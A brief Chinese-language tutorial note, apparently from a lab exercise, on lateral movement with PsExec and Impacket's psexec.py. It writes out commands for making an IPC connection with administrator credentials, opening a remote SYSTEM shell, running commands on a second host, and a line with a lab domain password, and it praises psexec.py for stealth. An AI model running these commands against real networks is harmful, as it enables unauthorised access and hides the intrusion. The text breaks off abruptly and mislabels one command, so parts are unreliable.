横向移动外部工具的使用
前言
psexec
首先已经获得了一个主机的会话,通过横向移动获得另一个主机的会话
在已获得的shell中输入
net use \192.168.52.141 /user:administrator “密码”
(1)psexec
https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec
psexec使用
建立IPC连接,无需输入密码
net use \192.168.52.141 /user:administrator “密码”
反弹cmd
psexec.exe \192.168.52.141 -s cmd.exe -acceptcula
执行命令
psexec.exe \192.168.52.141 whoami -acceptcula
psexec.py
与官方psexec.exe相比会自动删除服务,增加隐蔽性
psexec.exe god/Administrator:hongrisec@2019@192.168.52.141 whoami Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
psexec.py<